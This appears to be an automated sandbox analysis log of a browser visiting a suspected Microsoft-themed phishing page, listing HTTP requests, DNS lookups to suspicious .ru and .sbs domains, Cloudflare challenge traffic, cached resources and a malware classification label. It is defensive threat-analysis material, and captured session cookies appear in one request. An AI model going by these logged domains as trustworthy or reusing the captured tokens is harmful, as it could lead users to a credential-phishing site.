Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e8c6e9b1b1b437a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 7x7.jaaqwamco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://7x7.jaaqwamco.ru/Sb3OEcu/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkhjWDRiUlBmTzNOQ2x5dldLdFVKMEE9PSIsInZhbHVlIjoiSVBVSDJNUXVuL3RRdEh2Vjl6YzQ4M2UyeFU4UHJqL29jWjJ0eDh1VXl4cWpBYXpTbmJjQ1pIMnNlMTV0bnkxV0pHVkNBcUMvRyt3TDAyUFBGUWx5eVY4U0JsYTlNTmZ1ZXJMRlNudmVaaVpmdyt0T2YySkpaeTIrYnBmblUvdUUiLCJtYWMiOiJmMDY0NDlkZmE0NjVmOGRmMWYwOThkMjNlMWQxOTEwMzIyNDEwNDI1OGRkOWE2MWNlNTY4YTAwNDA0NmRjMTdlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFUK3d5TVYrb2trVlRYcVNhaWw0RWc9PSIsInZhbHVlIjoic3pEU3NFek5YOW5kNVNiVHNrQTYyd3VqZTcyUmpvNDczS1Y3YU04eHErNlpwWmk4cUpoUUdoNTc2QzFSZDV4M0toV1NpREZjdFliWWw3NTZseGpjdER3TEZqa2ZvQXVybjRWU1I5NzgzU2lxYTNjYXNYSlJ2TUsvOU1jVktyT3MiLCJtYWMiOiJmYjJiNDkxNzZiMDRiNmY2MTJhOGQwZjRlY2VhMmIzZDBkYWJiMTIzZTBhNTRkZjFmY2MwZWQyMjg4YTEzNzI4IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e8c6e9b1b1b437a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8e8c6e9b1b1b437a/1732650888673/83ef82c9ae1c1fab2ef43382ed78a78a49b63bd8d8160e9d4219cba19b858457/w15JzClzjgpXyEV HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8e8c6e9b1b1b437a/1732650888673/1F1YFoCiLDS1z55 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/162202576:1732648377:xJw3Yk9mP_9VbSTJ6hBeBUYSgE5rlGFuHoiAhOyQQkY/8e8c6e9b1b1b437a/U53pjxBE6J_qm7SeFH2fTixXqSKgUXPkQ7r9WMB6ixg-1732650884-1.1.1.1-TiNTbGxWksGGqbcVVWSpCjPEP5XonQk4nAMPFuFc8GGEp1fPMoQhEvt7Psw0jIKP HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW HTTP/1.1Host: uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://7x7.jaaqwamco.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7x7.jaaqwamco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /384603737182923034134733HBIvtgFvMdHIJNXFWYVMFPBUZFKSEIVKZFXFTFPINW HTTP/1.1Host: uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=s8KFDPC2G8SYPmy&MD=l5dLo5zL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: link.mail.beehiiv.com
Source: global trafficDNS traffic detected: DNS query: 3riverscap.sbs
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 7x7.jaaqwamco.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: www.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4775Host: login.live.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 19:54:26 GMTContent-Type: text/html; charset=UTF-8Content-Length: 13517Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 19:54:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GrEtKVGQwjzk%2BBxci6cI337FKcg7z1h%2B6pzs76O5RZkAT8L2j3orsvLARkBEovfpGzetT8Lh9UtiOZeWhQ6vGUgvBi6JAJqCAqFSEgnq17GGqIGn%2FYUbrOrrIyJiIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3992&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2161&delivery_rate=1018896&cwnd=252&unsent_bytes=0&cid=2328c576d3d6abcd&ts=343&x=0"CF-Cache-Status: HITAge: 1905Server: cloudflareCF-RAY: 8e8c6eac1eb14310-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1897&delivery_rate=1617728&cwnd=252&unsent_bytes=0&cid=fe11f6c4add6a472&ts=9825&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 19:54:51 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: WvEytYT9oMbSv3XqNHd8iEP/7FTbM1+Ter8=$44PUflrL5NN21Cs0Server: cloudflareCF-RAY: 8e8c6ec50ba47c6f-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 19:54:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: m+yk4RmgWr7e69OjcWoUXNi11GnNpjr+7pA=$NTB9tbZWHMCJF/7Bcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8e8c6eefc92572b1-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 19:55:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: EvMhQqhja2bCnSGbJHefqi9M/SxsjieJ5dQ=$27qwwitaK09zx4j8Server: cloudflareCF-RAY: 8e8c6f22ed7c6a5e-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_104.1.dr, chromecache_91.1.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://assets.onestore.ms/cdnfiles/external/mwf/long/v1/v1.25.0/css/mwf-west-european-default.min.c
Source: chromecache_96.1.drString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://onedrive.live.com/about/en-us/
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://outlook.live.com/owa/
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://products.office.com/en-us/home
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://products.office.com/en-us/microsoft-teams/free?icid=SSM_AS_Promo_Apps_MicrosoftTeams
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://statics-marketingsites-wcus-ms-com.akamaized.net/statics/override.css?c=7
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://www.onenote.com/
Source: chromecache_83.1.dr, chromecache_96.1.drString found in binary or memory: https://www.skype.com/en/
Source: chromecache_96.1.drString found in binary or memory: https://www.xbox.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 20.190.147.3:443 -> 192.168.2.16:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: classification engineClassification label: mal48.win@24/58@50/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,15468630849517401566,4594453010131145192,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
